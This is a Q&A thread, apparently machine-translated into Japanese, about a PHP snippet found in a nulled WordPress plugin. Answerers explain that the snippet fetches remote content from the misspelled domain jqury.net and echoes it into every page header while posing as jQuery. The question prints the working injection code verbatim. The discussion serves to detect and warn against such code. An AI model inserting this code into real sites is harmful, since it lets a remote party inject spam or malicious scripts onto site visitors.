プラグインでこれを見つけました。それは何をするためのものか?それは危険ですか?


17

プラグインでこれを見つけました。それは何をするためのものか?それは危険ですか?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

5
それはどのプラグインですか?
ダニエル

公式のWPサイトからプラグインを入手しましたか?
そのブラジル人

1
これは、顧客の1人がネットワークインストールで実行することを望んでいたプラグインでした。プラグインはwp-adminでこれを実行したかった。これを読んだ後、どこから来たのか尋ねた。トレントからのnulledプラグイン。短い答えはerm NO xXx
ソフィアローズ

回答:


16

ドメインのスペルミスが多いドメインからスパムを含むマークアップのブロックをロードします(ソースの一部を投稿することを考えていましたが、コンテンツを宣伝したくありません)http://jquery.com/--jQueryによって使用されます、評判がよく人気のあるJavascriptライブラリであり、WordPressがCoreに含まれています。実際には非常に異なるものをロードするときに、そのライブラリをロードしているように見えるというのがアイデアだと思います。

そして、jQueryをロードしているように見えることを試みる他の方法があります。変数名に注意してください$jquery

悪意のあるスクリプトもロードしようとする可能性があります。チェックしませんでした。私はでしょう間違いなくそのページのコンテンツは、ドメインコントローラがそのように感じるいつでも変更することができ、特に以来、危険なそれを呼び出します。

せいぜい、スパムを拡散するサイトを検索エンジンが見下ろしているため、サイトに損害を与えるだけです。

使用しないでください。それはあなたにとっても、サイトを運営している人々以外のウェブ上の誰にとっても有益なことではありません。評判の良いサイトでこれを見つけた場合は、彼らに報告してください。


7

はい、それは危険なコードであり、スパムサイトからコンテンツをロードします。

プラグインに名前を付けませんでしたが、Webサイトにインストールした後にこのコードを見つけた場合、プラグインコードはこのような開発者からのものではなく、インストール後にハッキングされた可能性があります。この場合、このプラグインだけでなく、Webサイトの多くで悪意のあるコードが見つかる可能性があります。

元々プラグインを入手した場所からダウンロードしたプラグインコードを確認し、この悪意のあるコードが元々そこにあったかどうかを確認します。そうでない場合は、サイトがハッキングされています。それが事実であると判断した場合は、Codexからこの記事をお読みください


3
これは、顧客の1人がネットワークインストールで実行することを望んでいたプラグインでした。プラグインはwp-adminでこれを実行したかった。これを読んだ後、どこから来たのか尋ねた。トレントからのnulledプラグイン。短い答えはerm NO xXx
ソフィアローズ
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.